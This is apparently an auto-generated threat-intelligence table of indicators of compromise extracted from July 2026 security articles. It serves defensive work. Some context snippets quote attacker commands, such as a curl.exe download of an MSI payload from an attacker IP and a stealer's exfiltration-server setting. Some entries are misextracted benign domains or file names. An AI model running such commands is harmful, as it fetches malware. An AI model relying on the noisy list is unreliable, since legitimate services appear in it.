Indicators of compromise
4,250 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| sha256 | 55a1eb4c2d3da04376df39d7ba832569c6af1a37a0cf2b95f754ac898023a30c | 0-9a-f]{16}.jsp Hash-check any suspicious JSP files against 55a1eb4c2d3da04376df39d7ba832569c6af1a37a0cf2b95f754ac898023a30c Check for flst.txt in /tmp or the Windchill working directo | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| domain | woocommerce-check.com | min credentials and exfiltrate them to an external server ("woocommerce-check[.]com") that masquerades as WooCommerce, an open-source e-comme | ⚡ Weekly Recap: Chrome 0-Day, Data Wipers, Misused Tools and Zero The Hacker News | · Jul 25, 2026 |
| domain | shutterstock.com | resolve real threats faster Image credit: Celia Ong / CKA / Shutterstock.com | ChatGPT Among Top 10 Most Impersonated Brands in Phishing Attacks Infosecurity Magazine | · Jul 24, 2026 |
| domain | easysend.co | om where the request is sent to a file-sharing service like EasySend[.]co to retrieve a ZIP archive. The ZIP file contains a Visual | Fake Notepad++ Plugin Delivers MATCHBOIL.V2 in UAC The Hacker News | · Jul 24, 2026 |
| domain | hunt.io | different from Operation Roundish , which was disclosed by Hunt.io back in March and uses longstanding infrastructure that CER | Fake Notepad++ Plugin Delivers MATCHBOIL.V2 in UAC The Hacker News | · Jul 24, 2026 |
| domain | is-01-ast.ols-img-12.workers.dev | ng API. The binary contains a Cloudflare Workers endpoint (“is-01-ast[.]ols-img-12[.]workers[.]dev”), but rather than making HTTP connections to this do | Chaos ransomware deploys browser-based msaRAT to evade network detection Security Affairs | · Jul 23, 2026 |
| md5 | 2915b3f8b703eb744fc54c81f4a9c67f | d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 MD5: 2915b3f8b703eb744fc54c81f4a9c67f Talos Rep: https://talosintelligence.com/talos_file_reputat | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| md5 | 38de5b216c33833af710e88f7f64fc98 | bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep: https://talosintelligence.com/talos_file_reputat | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| md5 | 770dbe473180366d7b539ff2c188e551 | fd3730234d907a2a0d98e3e253a5f0e222e4e4bf3badb3fd6aea0a MD5: 770dbe473180366d7b539ff2c188e551 Talos Rep: https://talosintelligence.com/talos_file_reputat | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| md5 | c2efb2dcacba6d3ccc175b6ce1b7ed0a | e6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a Talos Rep: https://talosintelligence.com/talos_file_reputat | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| md5 | dbd8dbecaa80795c135137d69921fdba | 05ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba MD5: dbd8dbecaa80795c135137d69921fdba Talos Rep: https://talosintelligence.com/talos_file_reputat | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| sha256 | 633bd79d1efd3730234d907a2a0d98e3e253a5f0e222e4e4bf3badb3fd6aea0a | tection Name: W32.Variant:MalwareXgenMisc.29d4.1201 SHA256: 633bd79d1efd3730234d907a2a0d98e3e253a5f0e222e4e4bf3badb3fd6aea0a MD5: 770dbe473180366d7b539ff2c188e551 Talos Rep: https://ta | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| sha256 | 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 | server_tcp.exe Detection Name: W32.Trojan.27oc.1201 SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a Talos Rep: https://ta | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| sha256 | 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f | D001.exe Detection Name: Win.Worm.Coinminer::1201** SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep: https://ta | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| sha256 | 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 | lware files from Talos telemetry over the past week SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 MD5: 2915b3f8b703eb744fc54c81f4a9c67f Talos Rep: https://ta | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| sha256 | e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba | -QAD.exe Detection Name: Win.Tool.Procpatcher::1201 SHA256: e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba MD5: dbd8dbecaa80795c135137d69921fdba Talos Rep: https://ta | Don’t swing at everything Cisco Talos | · Jul 23, 2026 |
| domain | is-01-ast.ols-img-12.workers.dev | hes STUN and TURN configuration from a Cloudflare Worker at is-01-ast[.]ols-img-12[.]workers[.]dev , with Origin and Referer headers disguised as traffi | Chaos Ransomware Uses msaRAT to Route C2 Traffic Through Headless Chrome and Edge The Hacker News | · Jul 23, 2026 |
| domain | claude-pro.com | ther campaign impersonated Anthropic's Claude software from claude-pro[.]com, registered on March 28, 2026, serving a malicious MSI in | China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks The Hacker News | · Jul 23, 2026 |
| domain | gouvvbo.top | [.]com, license[.]claude-pro[.]com, sylverixstrategy[.]com, gouvvbo[.]top, vertextrust-advisors[.]com, and three security-vendor lo | China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks The Hacker News | · Jul 23, 2026 |
| domain | license.claude-pro.com | r persistence. The Beagle backdoor it delivered reported to license[.]claude-pro[.]com. Sophos, working from the fake site, its hosting infras | China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks The Hacker News | · Jul 23, 2026 |
| domain | sylverixstrategy.com | er's domains: claude-pro[.]com, license[.]claude-pro[.]com, sylverixstrategy[.]com, gouvvbo[.]top, vertextrust-advisors[.]com, and three sec | China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks The Hacker News | · Jul 23, 2026 |
| domain | update-crowdstrike.com | ity-vendor lookalikes sharing one IP, update-trellix[.]com, update-crowdstrike[.]com and update-sentinelone[.]com. The staging server was 43.1 | China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks The Hacker News | · Jul 23, 2026 |
| domain | update-sentinelone.com | one IP, update-trellix[.]com, update-crowdstrike[.]com and update-sentinelone[.]com. The staging server was 43.106.71[.]28 on port 8000. Both | China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks The Hacker News | · Jul 23, 2026 |
| domain | update-trellix.com | .]com, and three security-vendor lookalikes sharing one IP, update-trellix[.]com, update-crowdstrike[.]com and update-sentinelone[.]com. T | China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks The Hacker News | · Jul 23, 2026 |
| domain | vertextrust-advisors.com | [.]claude-pro[.]com, sylverixstrategy[.]com, gouvvbo[.]top, vertextrust-advisors[.]com, and three security-vendor lookalikes sharing one IP, upd | China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks The Hacker News | · Jul 23, 2026 |
| domain | rambler.ru | previously observed activity associated with the "ischhfd83@rambler[.]ru" email address, which has been tracked under the moniker | Attackers Weaponize GitHub Actions Runners to Target cPanel and WHM Servers The Hacker News | · Jul 23, 2026 |
| domain | global.turn.twilio.com | cted host in order to traverse NAT, while the TURN server (“global.turn.twilio.com”) acts as a relay point when a direct Peer-to-Peer (P2P) co | Chaos ransomware's msaRAT: Living off the browser to build a covert C2 channel Cisco Talos | · Jul 23, 2026 |
| domain | is-01-ast.ols-img-12.workers.dev | mation First, a GET request is sent to Cloudflare Workers (“is-01-ast[.]ols-img-12[.]workers[.]dev”) to retrieve the STUN/TURN server configuration requ | Chaos ransomware's msaRAT: Living off the browser to build a covert C2 channel Cisco Talos | · Jul 23, 2026 |
| ipv4 | 172.86.126.18 | this traffic will pass through undetected. curl.exe http://172.86.126.18:443/update_ms.msi -o C:\programdata\update_ms.msi The prope | Chaos ransomware's msaRAT: Living off the browser to build a covert C2 channel Cisco Talos | · Jul 23, 2026 |
| domain | google.com | the Google Account, go to the Selfie video page (myaccount.google[.]com/video-verification) Turn Improve Google services (optiona | Google Adds Selfie Video Recovery for Users Locked Out of Their Accounts The Hacker News | · Jul 23, 2026 |
| domain | download-app.us | n redirected victims to an external domain, first claude.ai.download-app[.]us and subsequently downloading-api.it[.]com/html/claude/win | How attackers hosted a fake Claude download page on the claude.ai domain Help Net Security | · Jul 23, 2026 |
| domain | it.com | laude.ai.download-app[.]us and subsequently downloading-api.it[.]com/html/claude/win , from which they downloaded a bundle. It | How attackers hosted a fake Claude download page on the claude.ai domain Help Net Security | · Jul 23, 2026 |
| domain | polse.us | ed to ten domains going back to December 2025. One of them, polse[.]us , was seized by Microsoft as part of Operation Endgame af | How attackers hosted a fake Claude download page on the claude.ai domain Help Net Security | · Jul 23, 2026 |
| domain | cloudlanecdn.com | il" , // Compromised target Microsoft 365 mailbox "Host" : "cloudlanecdn[.]com" , // DNS bootstrap domain "PublicKey" : "-----BEGIN RSA | New Project CAV3RN .NET Native AOT communication module Kaspersky Securelist | · Jul 22, 2026 |
| domain | index.js | s behavior. The repository contains a JavaScript file named index[.]js . This file is encoded in Base64 with an XOR cipher, whic | PurpleBravo’s Targeting of the IT Software Supply Chain Recorded Future | · Jul 22, 2026 |
| domain | lumanagi.online | recruiter sent a document via Google Docs purportedly from lumanagi[.]online that contained information about their project, the job v | PurpleBravo’s Targeting of the IT Software Supply Chain Recorded Future | · Jul 22, 2026 |
| domain | routes.js | onas. This repository contained a similar malicious file to routes[.]js , which was observed in the Indian software development c | PurpleBravo’s Targeting of the IT Software Supply Chain Recorded Future | · Jul 22, 2026 |
| url | http://154[ | n IDs targeted by the Chrome “auto” modes. UPLOAD0623URL = "hxxp://154[.]58[.]204[.]15:8080" # Change to your server MAX0623SLEEP = | PurpleBravo’s Targeting of the IT Software Supply Chain Recorded Future | · Jul 22, 2026 |
| domain | gobf.mx | mpaign targeting Mexican users The MDR alert traced back to gobf[.]mx , a typosquat of the government's CURP national-ID lookup | Exposed Server Reveals AI-Assisted Phishing Toolkit Behind WebDAV Malware Campaign The Hacker News | · Jul 21, 2026 |
| domain | summerartcamp.net | losely enough that one recovered README preserved the exact summerartcamp[.]net@ssl@443\DavWWWRoot\OSYxaOjr example path from the origina | Exposed Server Reveals AI-Assisted Phishing Toolkit Behind WebDAV Malware Campaign The Hacker News | · Jul 21, 2026 |
| sha256 | 8cb0c223b018cecef1d990ec81c67b826eb3c30d54f06193cf69969e9a8baea2 | it before any retraining can start. Binary SHA-256: packed 8cb0c223b018cecef1d990ec81c67b826eb3c30d54f06193cf69969e9a8baea2 ; unpacked ea7822eac6cecef7746c606b862b4d3034856caf754c4cf6 | New ENCFORGE Ransomware Targets AI Model Files in Langflow RCE Attack The Hacker News | · Jul 21, 2026 |
| sha256 | ea7822eac6cecef7746c606b862b4d3034856caf754c4cf69533662637905328 | f1d990ec81c67b826eb3c30d54f06193cf69969e9a8baea2 ; unpacked ea7822eac6cecef7746c606b862b4d3034856caf754c4cf69533662637905328 . Sysdig has published the source and C2 addresses, the emb | New ENCFORGE Ransomware Targets AI Model Files in Langflow RCE Attack The Hacker News | · Jul 21, 2026 |
| domain | acortaurl.com | ing on links concealed using URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to. Blind Eagle makes use of compromised emai | Blind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra The Hacker News | · Jul 20, 2026 |
| domain | cort.as | ts or clicking on links concealed using URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to. Blind Eagle makes use of | Blind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra The Hacker News | · Jul 20, 2026 |
| domain | duckdns.org | ther enhanced by the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com." The threat group has als | Blind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra The Hacker News | · Jul 20, 2026 |
| domain | gtly.to | d using URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to. Blind Eagle makes use of compromised email accounts to s | Blind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra The Hacker News | · Jul 20, 2026 |
| domain | ip-ddns.com | y the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com." The threat group has also taken advanta | Blind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra The Hacker News | · Jul 20, 2026 |
| domain | noip.com | c DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com." The threat group has also taken advantage of legitimate | Blind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra The Hacker News | · Jul 20, 2026 |
| domain | cloudlanecdn.com | ues from IPv6 AAAA records sent back by an attacker domain, cloudlanecdn[.]com , then writes them to logAzure.txt , a file dressed up as | HollowGraph Malware Hides C2 and Stolen Files in Microsoft 365 Events Dated 2050 The Hacker News | · Jul 20, 2026 |
| domain | wp2shell.com | lly, Searchlight Cyber has released a free scanning tool at wp2shell.com so that administrators can safely check if their servers re | Researchers Build WordPress Exploit Using OpenAI's GPT Infosecurity Magazine | · Jul 20, 2026 |
| domain | disroot.org | download two payloads from a public Forgejo instance ("git.disroot[.]org/git-ecosystem"): a shell script ("deploy.sh") and a nativ | SleeperGem Uses Three Malicious RubyGems Packages to Target Developer Machines The Hacker News | · Jul 20, 2026 |
| domain | mend.io | ed them as a data exfiltration channel. Earlier this month, Mend.io disclosed details of an undocumented software supply chain | SleeperGem Uses Three Malicious RubyGems Packages to Target Developer Machines The Hacker News | · Jul 20, 2026 |
| domain | microsoft-toolkit.com | g : Spoofing legitimate brand names with subtle variations (Microsoft-Toolkit[.]com vs MicrosoftToolkit[.]com) Context weaponization : Embedd | How Threat Actors Are Rizzing Up Your AI for Profit Recorded Future | · Jul 20, 2026 |
| domain | microsofttoolkit.com | nd names with subtle variations (Microsoft-Toolkit[.]com vs MicrosoftToolkit[.]com) Context weaponization : Embedding malicious links within | How Threat Actors Are Rizzing Up Your AI for Profit Recorded Future | · Jul 20, 2026 |
| domain | socket.io | ware designed to exfiltrate valuable data and configuring a Socket.IO backdoor. Specifically, the repositories distributed as par | Fake Coding Tests Deliver OtterCookie-Aligned Malware Hidden in SVG Flag Images The Hacker News | · Jul 19, 2026 |
| domain | steamcommunity.com | data from an external server or from legitimate sites like steamcommunity[.]com. The use of ClickFix by the Kremlin-backed hacking crew m | UAC-0145 Uses ClickFix CAPTCHAs to Infect Ukrainian Devices wih Malware The Hacker News | · Jul 19, 2026 |
| domain | cdnorigin.net | XLab's indicators are a C2 at 209.99.186[.]235, the domain cdnorigin[.]net, and one agent sample, SHA1 31c69b3e12936abca770d430066f3 | New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens The Hacker News | · Jul 17, 2026 |
| sha1 | 31c69b3e12936abca770d430066f379ec1d997ec | 235, the domain cdnorigin[.]net, and one agent sample, SHA1 31c69b3e12936abca770d430066f379ec1d997ec. The Hacker News covered a different operator working the s | New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens The Hacker News | · Jul 17, 2026 |
| md5 | 19f8befcb035f52bf70094e6b4f5779a | 483737EA3566726E51752DFF40 7F223EE0716CE2AD56F55D3744419449 19F8BEFCB035F52BF70094E6B4F5779A 846EF7C1C7323849B2A778C5E4CDA162 TmcLoader D08A059E8B815E3B | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | 64e9d1950e42bc98486dfd9919463d1c | 95F97FBC ThumbcacheService CB6C4C70A3B171FA3404B8E1A3382116 64E9D1950E42BC98486DFD9919463D1C Stowaway CBBB6D483737EA3566726E51752DFF40 7F223EE0716CE2AD5 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | 7f223ee0716ce2ad56f55d3744419449 | 8486DFD9919463D1C Stowaway CBBB6D483737EA3566726E51752DFF40 7F223EE0716CE2AD56F55D3744419449 19F8BEFCB035F52BF70094E6B4F5779A 846EF7C1C7323849B2A778C5E4 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | 846ef7c1c7323849b2a778c5e4cda162 | E0716CE2AD56F55D3744419449 19F8BEFCB035F52BF70094E6B4F5779A 846EF7C1C7323849B2A778C5E4CDA162 TmcLoader D08A059E8B815E3B891505BC8777FC28 93A1569D5D5AB2C4 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | 93a1569d5d5ab2c4761fedf84f83709e | B2A778C5E4CDA162 TmcLoader D08A059E8B815E3B891505BC8777FC28 93A1569D5D5AB2C4761FEDF84F83709E C2 IP addresses 152.32.160[.]239 8.220.194[.]108 8.220.214[ | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | cb6c4c70a3b171fa3404b8e1a3382116 | 6D8 McMx D6E86BF8A90E9B632ADD5FA495F97FBC ThumbcacheService CB6C4C70A3B171FA3404B8E1A3382116 64E9D1950E42BC98486DFD9919463D1C Stowaway CBBB6D483737EA356 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | cbbb6d483737ea3566726e51752dff40 | A3404B8E1A3382116 64E9D1950E42BC98486DFD9919463D1C Stowaway CBBB6D483737EA3566726E51752DFF40 7F223EE0716CE2AD56F55D3744419449 19F8BEFCB035F52BF70094E6B4 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | d08a059e8b815e3b891505bc8777fc28 | F70094E6B4F5779A 846EF7C1C7323849B2A778C5E4CDA162 TmcLoader D08A059E8B815E3B891505BC8777FC28 93A1569D5D5AB2C4761FEDF84F83709E C2 IP addresses 152.32.160 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | d6e86bf8a90e9b632add5fa495f97fbc | A690BCDB922F82E0BACC5 DC506FF7BB72735444FB3703A6BEE6D8 McMx D6E86BF8A90E9B632ADD5FA495F97FBC ThumbcacheService CB6C4C70A3B171FA3404B8E1A3382116 64E9D195 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | dc506ff7bb72735444fb3703a6bee6d8 | mise File hashes GoSerpent EBFFD5A76AAA690BCDB922F82E0BACC5 DC506FF7BB72735444FB3703A6BEE6D8 McMx D6E86BF8A90E9B632ADD5FA495F97FBC ThumbcacheService CB6 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| md5 | ebffd5a76aaa690bcdb922f82e0bacc5 | the future. Indicators of compromise File hashes GoSerpent EBFFD5A76AAA690BCDB922F82E0BACC5 DC506FF7BB72735444FB3703A6BEE6D8 McMx D6E86BF8A90E9B632ADD5 | GoSerpent backdoor attacks in Southeast Asia Kaspersky Securelist | · Jul 17, 2026 |
| domain | polygon-rpc.com | triggered via JSON-RPC to the public Polygon RPC endpoint “polygon-rpc[.]com”, targeting the smart contract “0x6ae382ed2154cc84c6672e4 | New Russian Campaign Uses Fake Webex and Zoom Installers to Deploy Starland RAT Security Affairs | · Jul 17, 2026 |
| domain | claude-desktop.gitlab.io | CR Stealer through fake Claude Code pages on GitLab such as claude-desktop[.]gitlab[.]io . The other chain leaves fingerprints Microsoft's first | ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files The Hacker News | · Jul 17, 2026 |
| domain | creativecommunityinfo.art | es the lure. Two of the indicators in its Campaign 2 table, creativecommunityinfo[.]art and enhanceblabber[.]cc , are listed as a payload host an | ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files The Hacker News | · Jul 17, 2026 |
| domain | enhanceblabber.cc | rs in its Campaign 2 table, creativecommunityinfo[.]art and enhanceblabber[.]cc , are listed as a payload host and a C2. The Hacker News | ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files The Hacker News | · Jul 17, 2026 |
| domain | in.net | \Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe645 | ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files The Hacker News | · Jul 17, 2026 |
| domain | codebasecode.com | the Telegram channel. By running a DNS query for the domain codebasecode[.]com, it extracts and decrypts the fallback C2 address. By ext | New TELEPUZ Malware Spreads via ClickFix to Steal Data and Run Commands The Hacker News | · Jul 17, 2026 |
| domain | hurgadatour.shop | e." Both the stager and main DLL binary are retrieved from "hurgadatour[.]shop" domain. Written in C, TELEPUZ is lightweight and modular | New TELEPUZ Malware Spreads via ClickFix to Steal Data and Run Commands The Hacker News | · Jul 17, 2026 |
| domain | t.me | By extracting an encrypted URL from a Telegram profile's ("t[.]me/chanadarkpart") description. The channel was created on A | New TELEPUZ Malware Spreads via ClickFix to Steal Data and Run Commands The Hacker News | · Jul 17, 2026 |
| domain | asp.net | romising an internet-facing IIS web server and uploading an ASP.NET web shell. From there, they ran commands through the IIS wo | Spirals ransomware locks down victim systems in under 24 hours Help Net Security | · Jul 17, 2026 |
| md5 | 0398df5a18f71efcfeef4571a2cef577 | 191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a MD5: 0398df5a18f71efcfeef4571a2cef577 Talos Rep: https://talosintelligence.com/talos_file_reputat | Begun, the Patch Wars have Cisco Talos | · Jul 16, 2026 |
| md5 | 2915b3f8b703eb744fc54c81f4a9c67f | d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 MD5: 2915b3f8b703eb744fc54c81f4a9c67f Talos Rep: https://talosintelligence.com/talos_file_reputat | Begun, the Patch Wars have Cisco Talos | · Jul 16, 2026 |
| md5 | 38de5b216c33833af710e88f7f64fc98 | bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep: https://talosintelligence.com/talos_file_reputat | Begun, the Patch Wars have Cisco Talos | · Jul 16, 2026 |
| md5 | c2efb2dcacba6d3ccc175b6ce1b7ed0a | e6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a Talos Rep: https://talosintelligence.com/talos_file_reputat | Begun, the Patch Wars have Cisco Talos | · Jul 16, 2026 |
| sha256 | 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 | -QAD.exe Detection Name: Win.Tool.Procpatcher::1201 SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a Talos Rep: https://ta | Begun, the Patch Wars have Cisco Talos | · Jul 16, 2026 |
| sha256 | 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f | D001.exe Detection Name: Win.Worm.Coinminer::1201** SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep: https://ta | Begun, the Patch Wars have Cisco Talos | · Jul 16, 2026 |
| sha256 | 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 | lware files from Talos telemetry over the past week SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 MD5: 2915b3f8b703eb744fc54c81f4a9c67f Talos Rep: https://ta | Begun, the Patch Wars have Cisco Talos | · Jul 16, 2026 |
| sha256 | b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a | 0055df5.dll Detection Name: Auto.90B145.282358.in02 SHA256: b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a MD5: 0398df5a18f71efcfeef4571a2cef577 Talos Rep: https://ta | Begun, the Patch Wars have Cisco Talos | · Jul 16, 2026 |
| domain | digikalas.online | ointing to an Iranian-hosted machine, and the parent domain digikalas[.]online resolves to Iran’s Arvan Cloud CDN. Shared dropper infras | TuxBot v3: The IoT Botnet Built With AI Security Affairs | · Jul 16, 2026 |
| domain | aipythondevs.com | [.]com” (which is also likely to be a hijacked domain) and “aipythondevs[.]com” serve as the primary C2 for the Starland Python RAT. All | UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign Cisco Talos | · Jul 16, 2026 |
| domain | eorthopaedics.com | itimate traffic categories. The staging domains, including “eorthopaedics[.]com” (likely a hijacked domain), “web-devtools[.]com” (resemb | UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign Cisco Talos | · Jul 16, 2026 |
| domain | ipify.org | includes the victim's public IP address sourced from “api64.ipify[.]org”, the build name, region locale, computer name presented | UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign Cisco Talos | · Jul 16, 2026 |
| domain | polygon-rpc.com | triggered via JSON-RPC to the public Polygon RPC endpoint “polygon-rpc[.]com”, targeting the smart contract “0x6ae382ed2154cc84c6672e4 | UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign Cisco Talos | · Jul 16, 2026 |
| domain | sastoro.com | erving a narrow functional role: “eorthopaedics[.]com” and “sastoro[.]com” hosts the PowerShell stage chain under “/feed/” and “/al | UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign Cisco Talos | · Jul 16, 2026 |
| domain | web-devtools.com | ncluding “eorthopaedics[.]com” (likely a hijacked domain), “web-devtools[.]com” (resembles a developer tooling portal), and “zynaris[.]i | UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign Cisco Talos | · Jul 16, 2026 |
| domain | windowscreenrepairnearme.com | C2 infrastructure used for the same campaign. The domains “windowscreenrepairnearme[.]com” (which is also likely to be a hijacked domain) and “aipy | UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign Cisco Talos | · Jul 16, 2026 |
| domain | zynaris.io | evtools[.]com” (resembles a developer tooling portal), and “zynaris[.]io” (resembles a technology start-up), with each domain serv | UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign Cisco Talos | · Jul 16, 2026 |
| domain | hunt.io | cause those two servers overlap with the TencShell cluster, Hunt.io assesses with moderate confidence that Gshell is a second C | Claude Code and DeepSeek Powered Chinese Cyber Espionage Campaign Security Affairs | · Jul 16, 2026 |
| domain | nasa.gov | ion rather than as a confirmed breach. NASA hosts launchpad.nasa[.]gov and ngis.nasa[.]gov were logged in network scanning outpu | Claude Code and DeepSeek Powered Chinese Cyber Espionage Campaign Security Affairs | · Jul 16, 2026 |
| domain | booking.com | credential-stealing malware by cybercriminals impersonating Booking.com. In a phishing campaign that began in December 2024 and has | Phishing campaign impersonating Booking.com targets hospitality sector with malware The Record | · Jul 16, 2026 |
| domain | systeminfor.com | stomized PlugX payload that communicated with the C2 domain systeminfor[.]com. The document purported to be an official Vatican letter | Chinese State-Sponsored Group ‘RedDelta’ Targets the Vatican and Catholic Organizations Recorded Future | · Jul 16, 2026 |
| ipv4 | 82.114.160.93 | itional Netsweeper devices on YemenNet on two IP addresses: 82.114.160.93 and 82.114.160.94. The device identified on 82.114.160.98 w | Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict/yemen-internet Recorded Future | · Jul 16, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.